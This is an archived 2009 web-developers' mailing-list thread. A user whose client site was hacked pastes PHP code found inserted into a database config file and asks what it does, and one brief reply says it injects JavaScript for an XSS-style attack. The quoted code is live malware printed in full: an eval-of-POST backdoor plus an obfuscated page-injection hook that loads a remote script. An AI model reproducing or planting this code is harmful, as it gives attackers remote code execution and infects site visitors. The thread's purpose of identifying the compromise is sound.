[thelist] Client site hacked - need help understanding inserted PHP code

John Corry jcorry at gmail.com
Wed Mar 25 16:37:56 CDT 2009 

It's trying to add some javascript function to your page and call it  
probably onload.

Useful for a XSS attack.

John Corry
email: jcorry at gmail.com




On Mar 25, 2009, at 5:34 PM, CosmicFawn wrote:

> I have a client who's website was hacked into in the last few days, I
> know for sure that someone was in there because they've added some php
> code to my dbinfo file.  I was wondering if someone out there with  
> more
> php knowledge than I have can tell me what this code is designed to  
> do.
>
> if(!function_exists('tmp_lkojfghx')) 
> {if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(! 
> defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0M5V3N4RGxjcjBvaXB0OVclMjBzT21yamNjJTNEJTJGa3IlMkY5NCUyRTlXMjRqYzclMkUyJTJFMTk5VzUlMkZqcTBvdWVPbXIwb3klMkVGQmpzJTNFJTNDJTJGT21zY0ZCcmlrcnB0amMlM0UnKS5yZXBsYWNlKC9qY3xrcnxxcnxGQnxPbXwyb3wwb3w5V3x4RGwvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function
> tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)) 
> $s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</ 
> script>#is',$s,$a))foreach($a[0]
> as
> $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\ 
> [\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#', 
> $v);if((preg_match('#\beval\b#',$v)&&($e|| 
> strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write'))) 
> $s=str_replace($v,'',$s);}$s1=preg_replace('#<script
> language=javascript><!-- \ndocument\.write\(unescape\(.+?\n
> --></script>#','',$s);if(stristr($s,'<body')) 
> $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!= 
> $s)||stristr($s,'</body')||stristr($s,'</title>'))$s= 
> $s1.TMP_XHGFJOKL;return
> $g?gzencode($s):$s;}function
> tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&& 
> $GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a, 
> $b,$c,$d);foreach(@ob_get_status(1)
> as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else
> $s[]=array($a=='default output
> handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i] 
> [1 
> ]= 
> ob_get_contents 
> ();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i+ 
> +){ob_start($s[$i][0]);echo
> $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))! 
> ='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
>
> Thanks so much.
>
> Rae.
>
>
> -- 
>
> * * Please support the community that supports you.  * *
> http://evolt.org/help_support_evolt/
>
> For unsubscribe and other options, including the Tip Harvester
> and archives of thelist go to: http://lists.evolt.org
> Workers of the Web, evolt !

More information about the thelist mailing list